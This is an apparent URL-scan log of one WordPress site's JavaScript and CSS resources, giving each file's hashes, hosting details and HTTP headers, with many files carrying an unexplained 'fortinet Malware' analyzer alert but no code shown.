last-modified: Thu, 30 Jul 2020 07:04:10 GMT
etag: "14013b1-654-5aba3476e8e80-br"
accept-ranges: bytes
vary: Accept-Encoding
content-encoding: br
content-length: 460
content-type: text/css
date: Wed, 21 Sep 2022 04:23:39 GMT
server: Apache
X-Firefox-Spdy: h2
www.comm2po.ca/wp-content/plugins/pixelyoursite/dist/scripts/jquery.bind-first-0.2.3.min.js?ver=5.4.2
72.167.59.18200 OK 625 B URL HTTP/2 www.comm2po.ca/wp-content/plugins/pixelyoursite/dist/scripts/jquery.bind-first-0.2.3.min.js?ver=5.4.2
IP 72.167.59.18:0
ASN #398101 GO-DADDY-COM-LLC
File type ASCII text, with very long lines (1147)
Hash c7da7c1b46ca9b6599ec9002dc45d84a
a37ffbba8290f68c0b10ed966338b12adf31d11a
50d95fb57caba95daa487939cedc601ceaec590f404293e6f9edf6ad907d1820
Analyzer Verdict Alert fortinet Malware
GET /wp-content/plugins/pixelyoursite/dist/scripts/jquery.bind-first-0.2.3.min.js?ver=5.4.2 HTTP/1.1
Host: www.comm2po.ca
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.comm2po.ca/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Mon, 03 Aug 2020 07:05:01 GMT
etag: "156063d-526-5abf3c1d64140-br"
accept-ranges: bytes
vary: Accept-Encoding
content-encoding: br
content-length: 625
content-type: application/javascript
date: Wed, 21 Sep 2022 04:23:39 GMT
server: Apache
X-Firefox-Spdy: h2
www.comm2po.ca/wp-content/plugins/sitepress-multilingual-cms/res/js/browser-redirect.js?ver=3.1.9.7
72.167.59.18200 OK 618 B URL HTTP/2 www.comm2po.ca/wp-content/plugins/sitepress-multilingual-cms/res/js/browser-redirect.js?ver=3.1.9.7
IP 72.167.59.18:0
ASN #398101 GO-DADDY-COM-LLC
Hash 6bae03589cb890edb67c1875a1152133
25ed8aa72122a4fd604703664f44c642090ecfc6
facb1cabf2da17e3cc62d8c8fb17979e3be1cbb823bc13dbef1b3a168e85538b
Analyzer Verdict Alert fortinet Malware
GET /wp-content/plugins/sitepress-multilingual-cms/res/js/browser-redirect.js?ver=3.1.9.7 HTTP/1.1
Host: www.comm2po.ca
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.comm2po.ca/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Tue, 18 Aug 2015 00:59:58 GMT
etag: "1561717-9f9-51d8b6fdd7f80-br"
accept-ranges: bytes
vary: Accept-Encoding
content-encoding: br
content-length: 618
content-type: application/javascript
date: Wed, 21 Sep 2022 04:23:39 GMT
server: Apache
X-Firefox-Spdy: h2
www.comm2po.ca/wp-content/plugins/pixelyoursite/dist/scripts/js.cookie-2.1.3.min.js?ver=2.1.3
72.167.59.18200 OK 832 B URL HTTP/2 www.comm2po.ca/wp-content/plugins/pixelyoursite/dist/scripts/js.cookie-2.1.3.min.js?ver=2.1.3
IP 72.167.59.18:0
ASN #398101 GO-DADDY-COM-LLC
File type ASCII text, with very long lines (1709)
Hash 2f885ec90da398ab8d4ea7c908b532a4
e3c300694c4e79aae8bc0b3a4c1ef0e235aec87c
3f7f9ae1a7e0c7367c4864eccdf867a2a5d5371806f74029d48cf3a1c5b8c153
GET /wp-content/plugins/pixelyoursite/dist/scripts/js.cookie-2.1.3.min.js?ver=2.1.3 HTTP/1.1
Host: www.comm2po.ca
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.comm2po.ca/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Mon, 03 Aug 2020 07:05:01 GMT
etag: "156063e-6d7-5abf3c1d64140-br"
accept-ranges: bytes
vary: Accept-Encoding
content-encoding: br
content-length: 832
content-type: application/javascript
date: Wed, 21 Sep 2022 04:23:39 GMT
server: Apache
X-Firefox-Spdy: h2
www.comm2po.ca/wp-content/plugins/sitepress-multilingual-cms/res/js/language-selector.js?ver=3.1.9.7
72.167.59.18200 OK 237 B URL HTTP/2 www.comm2po.ca/wp-content/plugins/sitepress-multilingual-cms/res/js/language-selector.js?ver=3.1.9.7
IP 72.167.59.18:0
ASN #398101 GO-DADDY-COM-LLC
Hash ca808d973d37154d6dad92a246e7c7bb
dd6850124ea497a275c5a4d1f8e0bf438bd0dfae
fac0f38bfbd87190178ef9bb0011f6acad4bcfc6ee73342b00700779b1e9f5ca
Analyzer Verdict Alert fortinet Malware
GET /wp-content/plugins/sitepress-multilingual-cms/res/js/language-selector.js?ver=3.1.9.7 HTTP/1.1
Host: www.comm2po.ca
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.comm2po.ca/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Tue, 18 Aug 2015 00:59:58 GMT
etag: "156171f-44f-51d8b6fdd7f80-br"
accept-ranges: bytes
vary: Accept-Encoding
content-encoding: br
content-length: 237
content-type: application/javascript
date: Wed, 21 Sep 2022 04:23:39 GMT
server: Apache
X-Firefox-Spdy: h2
www.comm2po.ca/wp-content/themes/prodigy/assets/css/selectric.css?ver=1.0
72.167.59.18200 OK 887 B URL HTTP/2 www.comm2po.ca/wp-content/themes/prodigy/assets/css/selectric.css?ver=1.0
IP 72.167.59.18:0
ASN #398101 GO-DADDY-COM-LLC
Hash 7214a5b4d8e49e23d88d33d7bd0c837d
58f8f7c08b6dc857b9f04fbef0de5786fb3c3bdd
aa5a1f31f57b4b3e7aff70fc38a358880454e457a3a8b3fde7c3ca26ecd7c7bd
GET /wp-content/themes/prodigy/assets/css/selectric.css?ver=1.0 HTTP/1.1
Host: www.comm2po.ca
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.comm2po.ca/
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Tue, 27 Jun 2017 22:58:54 GMT
etag: "12c0eba-d86-552f902fca780-br"
accept-ranges: bytes
vary: Accept-Encoding
content-encoding: br
content-length: 887
content-type: text/css
date: Wed, 21 Sep 2022 04:23:39 GMT
server: Apache
X-Firefox-Spdy: h2
www.comm2po.ca/wp-content/themes/prodigy/assets/css/elastic-slider.css?ver=1.0
72.167.59.18200 OK 782 B URL HTTP/2 www.comm2po.ca/wp-content/themes/prodigy/assets/css/elastic-slider.css?ver=1.0
IP 72.167.59.18:0
ASN #398101 GO-DADDY-COM-LLC
File type ASCII text, with CRLF line terminators
Hash 1171c05c450f7c3298463e885ffea7dc
62b749898765023aae183602018813db2e87b899
5196540816a1490d0fae89163f74a41c8728c77e1829b760e43e043f58a13542
Analyzer Verdict Alert fortinet Malware
GET /wp-content/themes/prodigy/assets/css/elastic-slider.css?ver=1.0 HTTP/1.1
Host: www.comm2po.ca
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.comm2po.ca/
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Tue, 27 Jun 2017 22:58:54 GMT
etag: "12c0eb5-cad-552f902fca780-br"
accept-ranges: bytes
vary: Accept-Encoding
content-encoding: br
content-length: 782
content-type: text/css
date: Wed, 21 Sep 2022 04:23:39 GMT
server: Apache
X-Firefox-Spdy: h2
www.comm2po.ca/wp-content/themes/prodigy-child/style.css?ver=5.4.2
72.167.59.18200 OK 2.0 kB URL HTTP/2 www.comm2po.ca/wp-content/themes/prodigy-child/style.css?ver=5.4.2
IP 72.167.59.18:0
ASN #398101 GO-DADDY-COM-LLC
File type ASCII text, with very long lines (309)
Hash 87991ee39884a4cfa13dc40320b6d387
8a399b2a4d8f2d490d9621fdcd7fcfd17d3305ea
e75636ccf5419b870a5402b322012b53d5956de1997d5be554937dc559e91f74
GET /wp-content/themes/prodigy-child/style.css?ver=5.4.2 HTTP/1.1
Host: www.comm2po.ca
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.comm2po.ca/
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Tue, 12 Mar 2019 08:19:33 GMT
etag: "1043e17-1a4b-583e159524f40-br"
accept-ranges: bytes
vary: Accept-Encoding
content-encoding: br
content-length: 1975
content-type: text/css
date: Wed, 21 Sep 2022 04:23:39 GMT
server: Apache
X-Firefox-Spdy: h2
www.comm2po.ca/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1
72.167.59.18200 OK 3.8 kB URL HTTP/2 www.comm2po.ca/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1
IP 72.167.59.18:0
ASN #398101 GO-DADDY-COM-LLC
File type ASCII text, with very long lines (9959)
Hash 64058b5c90087e60ed2b342c1d18fcd3
a394e8d8379db2385e0708ecfc5e6d5808d3a73c
0e89b20002741f049bb2e8391164783a67e89ce1cf8c2646a7417e20b8fb5cce
Analyzer Verdict Alert fortinet Malware
GET /wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1 HTTP/1.1
Host: www.comm2po.ca
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.comm2po.ca/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Fri, 20 May 2016 06:11:28 GMT
etag: "158126a-2748-5333ff613c400-br"
accept-ranges: bytes
vary: Accept-Encoding
content-encoding: br
content-length: 3826
content-type: application/javascript
date: Wed, 21 Sep 2022 04:23:39 GMT
server: Apache
X-Firefox-Spdy: h2
www.comm2po.ca/wp-content/themes/prodigy/assets/css/adjust.css?ver=1.0
72.167.59.18200 OK 2.8 kB URL HTTP/2 www.comm2po.ca/wp-content/themes/prodigy/assets/css/adjust.css?ver=1.0
IP 72.167.59.18:0
ASN #398101 GO-DADDY-COM-LLC
File type ASCII text, with CRLF line terminators
Hash 68d6e51b0d09b5114883d0d1833ec271
3a4b2a9817b37882165b785c75d36dd1168bc64a
7267285e57c87f4a6b411e175951de93a4b1723be2d3d94a72961b5cf133593a
GET /wp-content/themes/prodigy/assets/css/adjust.css?ver=1.0 HTTP/1.1
Host: www.comm2po.ca
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.comm2po.ca/
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Tue, 27 Jun 2017 22:58:54 GMT
etag: "12c0eab-44ff-552f902fca780-br"
accept-ranges: bytes
vary: Accept-Encoding
content-encoding: br
content-length: 2783
content-type: text/css
date: Wed, 21 Sep 2022 04:23:39 GMT
server: Apache
X-Firefox-Spdy: h2
www.comm2po.ca/wp-content/plugins/sitepress-multilingual-cms/res/js/jquery.cookie.js?ver=3.1.9.7
72.167.59.18200 OK 976 B URL HTTP/2 www.comm2po.ca/wp-content/plugins/sitepress-multilingual-cms/res/js/jquery.cookie.js?ver=3.1.9.7
IP 72.167.59.18:0
ASN #398101 GO-DADDY-COM-LLC
Hash 0ea878e44791390de12d5f7aef0276b1
612ca6a5a04bfc0a3d548586a54b723249fa1b69
7262e18d2c5b37c6d45f3d78b21d4c627d00a00e0dd6108a81e640a24b4adaf9
Analyzer Verdict Alert fortinet Malware
GET /wp-content/plugins/sitepress-multilingual-cms/res/js/jquery.cookie.js?ver=3.1.9.7 HTTP/1.1
Host: www.comm2po.ca
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.comm2po.ca/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Tue, 18 Aug 2015 00:59:58 GMT
etag: "156171e-b01-51d8b6fdd7f80-br"
accept-ranges: bytes
vary: Accept-Encoding
content-encoding: br
content-length: 976
content-type: application/javascript
date: Wed, 21 Sep 2022 04:23:39 GMT
server: Apache
X-Firefox-Spdy: h2
www.comm2po.ca/wp-content/themes/prodigy/assets/css/superslides.css?ver=1.0
72.167.59.18200 OK 986 B URL HTTP/2 www.comm2po.ca/wp-content/themes/prodigy/assets/css/superslides.css?ver=1.0
IP 72.167.59.18:0
ASN #398101 GO-DADDY-COM-LLC
File type ASCII text, with CRLF line terminators
Hash f21feeaf2ae602a243273616d440c9c6
8112435e10aa3cc8ac9e2ed05ea30139117ed163
3623436bb1db840738ab7d7a4f6cbd628baa46f1b46af49c4d62891a7acaa96d
Analyzer Verdict Alert fortinet Malware
GET /wp-content/themes/prodigy/assets/css/superslides.css?ver=1.0 HTTP/1.1
Host: www.comm2po.ca
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.comm2po.ca/
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Tue, 27 Jun 2017 22:58:56 GMT
etag: "12c0ebc-ea9-552f9031b2c00-br"
accept-ranges: bytes
vary: Accept-Encoding
content-encoding: br
content-length: 986
content-type: text/css
date: Wed, 21 Sep 2022 04:23:39 GMT
server: Apache
X-Firefox-Spdy: h2
www.comm2po.ca/wp-includes/js/jquery/ui/widget.min.js?ver=1.11.4
72.167.59.18200 OK 2.4 kB URL HTTP/2 www.comm2po.ca/wp-includes/js/jquery/ui/widget.min.js?ver=1.11.4
IP 72.167.59.18:0
ASN #398101 GO-DADDY-COM-LLC
File type ASCII text, with very long lines (6614)
Hash c020107bdd35ee5a19785eb1d9c025fb
237a54a9dcd23e1d2e2b658e8b9f7dddedb59387
c56c58845936caea731e4e7e49888555695aa57d0774500739ab9a69a9cb212c
GET /wp-includes/js/jquery/ui/widget.min.js?ver=1.11.4 HTTP/1.1
Host: www.comm2po.ca
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.comm2po.ca/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Sat, 05 Oct 2019 22:01:04 GMT
etag: "158129e-1ab6-59430f471e800-br"
accept-ranges: bytes
vary: Accept-Encoding
content-encoding: br
content-length: 2411
content-type: application/javascript
date: Wed, 21 Sep 2022 04:23:39 GMT
server: Apache
X-Firefox-Spdy: h2
www.comm2po.ca/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=5.2.1
72.167.59.18200 OK 3.7 kB URL HTTP/2 www.comm2po.ca/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=5.2.1
IP 72.167.59.18:0
ASN #398101 GO-DADDY-COM-LLC
Hash 0dda35cfb3d24663b1bd3c072540183d
1717c573205edc2d9186f668cdeb310a8394c491
2895b624b4cac02ff107ca50ba188c3024fa8816f19e3dc61060f324d73e4a97
GET /wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=5.2.1 HTTP/1.1
Host: www.comm2po.ca
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.comm2po.ca/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Thu, 06 Aug 2020 07:04:43 GMT
etag: "15410fe-3719-5ac301a49b8c0-br"
accept-ranges: bytes
vary: Accept-Encoding
content-encoding: br
content-length: 3658
content-type: application/javascript
date: Wed, 21 Sep 2022 04:23:39 GMT
server: Apache
X-Firefox-Spdy: h2
www.comm2po.ca/wp-content/plugins/google-analytics-for-wordpress/assets/js/frontend.min.js?ver=7.12.2
72.167.59.18200 OK 2.6 kB URL HTTP/2 www.comm2po.ca/wp-content/plugins/google-analytics-for-wordpress/assets/js/frontend.min.js?ver=7.12.2
IP 72.167.59.18:0
ASN #398101 GO-DADDY-COM-LLC
File type ASCII text, with very long lines (1022)
Hash d19bfc673a0302c927c2292e6beebad3
e1369273d693be64c762c60d95c95fbc0365b673
ff245e552924917ee1b77b771685dd970027c66d8f8cfde2184622c6d891022c
Analyzer Verdict Alert fortinet Malware
GET /wp-content/plugins/google-analytics-for-wordpress/assets/js/frontend.min.js?ver=7.12.2 HTTP/1.1
Host: www.comm2po.ca
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.comm2po.ca/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Tue, 11 Aug 2020 07:05:50 GMT
etag: "15600c1-2452-5ac94b37cef80-br"
accept-ranges: bytes
vary: Accept-Encoding
content-encoding: br
content-length: 2560
content-type: application/javascript
date: Wed, 21 Sep 2022 04:23:39 GMT
server: Apache
X-Firefox-Spdy: h2
www.comm2po.ca/wp-content/plugins/js_composer/assets/lib/bower/font-awesome/css/font-awesome.min.css?ver=4.12
72.167.59.18200 OK 5.9 kB URL HTTP/2 www.comm2po.ca/wp-content/plugins/js_composer/assets/lib/bower/font-awesome/css/font-awesome.min.css?ver=4.12
IP 72.167.59.18:0
ASN #398101 GO-DADDY-COM-LLC
File type ASCII text, with very long lines (27230)
Hash 742b6e006f6926f9ce1e61c6c3cafc40
2334ae07b08d3fd83af6fb5731cbd870309e2ac3
51da9f34ec2cc3e90177b37e446d3863fa9488ec211ed723aff29f4b5376803b
Analyzer Verdict Alert fortinet Malware
GET /wp-content/plugins/js_composer/assets/lib/bower/font-awesome/css/font-awesome.min.css?ver=4.12 HTTP/1.1
Host: www.comm2po.ca
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.comm2po.ca/
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Tue, 07 Jun 2016 20:17:36 GMT
etag: "1560375-6b00-534b5e13ab800-br"
accept-ranges: bytes
vary: Accept-Encoding
content-encoding: br
content-length: 5917
content-type: text/css
date: Wed, 21 Sep 2022 04:23:39 GMT
server: Apache
X-Firefox-Spdy: h2
www.comm2po.ca/wp-content/themes/prodigy/assets/js/custom_google_maps.js?ver=1
72.167.59.18200 OK 745 B URL HTTP/2 www.comm2po.ca/wp-content/themes/prodigy/assets/js/custom_google_maps.js?ver=1
IP 72.167.59.18:0
ASN #398101 GO-DADDY-COM-LLC
File type ASCII text, with CRLF line terminators
Hash f031b9016d51108a254e7027e0b178a7
d8277921e1c7940714c5680a390ae453925507a1
baf29ac239984f8e6dc0dd50c2530219654b94cf826636a46fc9217d8e1497f2
Analyzer Verdict Alert fortinet Malware
GET /wp-content/themes/prodigy/assets/js/custom_google_maps.js?ver=1 HTTP/1.1
Host: www.comm2po.ca
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.comm2po.ca/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Tue, 27 Jun 2017 22:58:56 GMT
etag: "13216cf-2867-552f9031b2c00-br"
accept-ranges: bytes
vary: Accept-Encoding
content-encoding: br
content-length: 745
content-type: application/javascript
date: Wed, 21 Sep 2022 04:23:39 GMT
server: Apache
X-Firefox-Spdy: h2
www.comm2po.ca/wp-includes/js/comment-reply.min.js?ver=5.4.2
72.167.59.18200 OK 1.0 kB URL HTTP/2 www.comm2po.ca/wp-includes/js/comment-reply.min.js?ver=5.4.2
IP 72.167.59.18:0
ASN #398101 GO-DADDY-COM-LLC
File type ASCII text, with very long lines (2385)
Hash 3d19075f5ff4f72373bab47b9035d6dd
f905ed08c8ab6569dab8feb280a1e2abf5c3443c
b9e6e65fb33b83eccbb24fc75b057797af3359b0320e7e92d537aa986e9e64b0
GET /wp-includes/js/comment-reply.min.js?ver=5.4.2 HTTP/1.1
Host: www.comm2po.ca
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.comm2po.ca/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Mon, 11 Nov 2019 11:51:03 GMT
etag: "1021f9c-974-59710befbd7c0-br"
accept-ranges: bytes
vary: Accept-Encoding
content-encoding: br
content-length: 1042
content-type: application/javascript
date: Wed, 21 Sep 2022 04:23:39 GMT
server: Apache
X-Firefox-Spdy: h2
www.comm2po.ca/wp-content/themes/prodigy/assets/js/scroll-anims.js?ver=1
72.167.59.18200 OK 874 B URL HTTP/2 www.comm2po.ca/wp-content/themes/prodigy/assets/js/scroll-anims.js?ver=1
IP 72.167.59.18:0
ASN #398101 GO-DADDY-COM-LLC
File type ASCII text, with CRLF line terminators
Hash 11e9dba05241fb5442dbff7c9bd020ff
9b8a289dc949de18903f053501ee3c95f68fa353
0aabc188516db5eb78c2e78ac3027fae549b39de5988a2519ba27efa87fa356f
Analyzer Verdict Alert fortinet Malware
GET /wp-content/themes/prodigy/assets/js/scroll-anims.js?ver=1 HTTP/1.1
Host: www.comm2po.ca
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.comm2po.ca/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Tue, 27 Jun 2017 22:58:56 GMT
etag: "13216e3-e3a-552f9031b2c00-br"
accept-ranges: bytes
vary: Accept-Encoding
content-encoding: br
content-length: 874
content-type: application/javascript
date: Wed, 21 Sep 2022 04:23:39 GMT
server: Apache
X-Firefox-Spdy: h2
www.comm2po.ca/wp-includes/js/dist/dom-ready.min.js?ver=91fc8f05178d5c6365aec778f840ae17
72.167.59.18200 OK 543 B URL HTTP/2 www.comm2po.ca/wp-includes/js/dist/dom-ready.min.js?ver=91fc8f05178d5c6365aec778f840ae17
IP 72.167.59.18:0
ASN #398101 GO-DADDY-COM-LLC
File type ASCII text, with very long lines (1184)
Hash f9d7cdf3162a58ed0bd2d474aec60f56
8494735a7a4ec38064540375cc76a44a480ff844
266f78067d7b997e4000550737bce236dda6291e3c521ab46cffa9297f7104b7
Analyzer Verdict Alert fortinet Malware
GET /wp-includes/js/dist/dom-ready.min.js?ver=91fc8f05178d5c6365aec778f840ae17 HTTP/1.1
Host: www.comm2po.ca
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.comm2po.ca/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Tue, 24 Mar 2020 10:05:19 GMT
etag: "1581212-4c3-5a196e39655c0-br"
accept-ranges: bytes
vary: Accept-Encoding
content-encoding: br
content-length: 543
content-type: application/javascript
date: Wed, 21 Sep 2022 04:23:39 GMT
server: Apache
X-Firefox-Spdy: h2
www.comm2po.ca/wp-content/themes/prodigy/assets/js/customizer.js?ver=5.4.2
72.167.59.18200 OK 217 B URL HTTP/2 www.comm2po.ca/wp-content/themes/prodigy/assets/js/customizer.js?ver=5.4.2
IP 72.167.59.18:0
ASN #398101 GO-DADDY-COM-LLC
File type ASCII text, with CRLF line terminators
Hash e0e6d086726c31b90a381a4535c13d15
b3d4b10655da8810e7bcf3a7bdeedacc75bdc81e
b470ff109e8d48653414862668478ffc406ea3c870fb10e5639a76173e0edac6
Analyzer Verdict Alert fortinet Malware
GET /wp-content/themes/prodigy/assets/js/customizer.js?ver=5.4.2 HTTP/1.1
Host: www.comm2po.ca
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.comm2po.ca/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Tue, 27 Jun 2017 22:58:56 GMT
etag: "13216d0-292-552f9031b2c00-br"
accept-ranges: bytes
vary: Accept-Encoding
content-encoding: br
content-length: 217
content-type: application/javascript
date: Wed, 21 Sep 2022 04:23:39 GMT
server: Apache
X-Firefox-Spdy: h2
www.comm2po.ca/wp-content/themes/prodigy/assets/css/et-line.css?ver=1.0
72.167.59.18200 OK 1.5 kB URL HTTP/2 www.comm2po.ca/wp-content/themes/prodigy/assets/css/et-line.css?ver=1.0
IP 72.167.59.18:0
ASN #398101 GO-DADDY-COM-LLC
File type ASCII text, with very long lines (1512)
Hash 90416410a4069570c7223648f05eb723
cddc15792235b58362dc502ecc8fd7de3a0c1351
3e4ea8724831d0250f57134b7613786c04c140de174d60d013c07da9f281b918
Analyzer Verdict Alert fortinet Malware
GET /wp-content/themes/prodigy/assets/css/et-line.css?ver=1.0 HTTP/1.1
Host: www.comm2po.ca
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.comm2po.ca/
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Tue, 27 Jun 2017 22:58:54 GMT
etag: "12c0eb6-1b9b-552f902fca780-br"
accept-ranges: bytes
vary: Accept-Encoding
content-encoding: br
content-length: 1535
content-type: text/css
date: Wed, 21 Sep 2022 04:23:39 GMT
server: Apache
X-Firefox-Spdy: h2
www.comm2po.ca/wp-content/themes/prodigy/assets/css/fotorama.css?ver=1.0
72.167.59.18200 OK 2.5 kB URL HTTP/2 www.comm2po.ca/wp-content/themes/prodigy/assets/css/fotorama.css?ver=1.0
IP 72.167.59.18:0
ASN #398101 GO-DADDY-COM-LLC
File type ASCII text, with very long lines (14151)
Hash 5cc664e6623f8376a924a6dfe1eaa803
52ffa3bafecae1a6105b4da9b74923ae04ee35aa
3ef48520a5c9b3be0bfcfd64798231fe45769eabcce33e38fce9e74a1d0a1ae1
Analyzer Verdict Alert fortinet Malware
GET /wp-content/themes/prodigy/assets/css/fotorama.css?ver=1.0 HTTP/1.1
Host: www.comm2po.ca
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
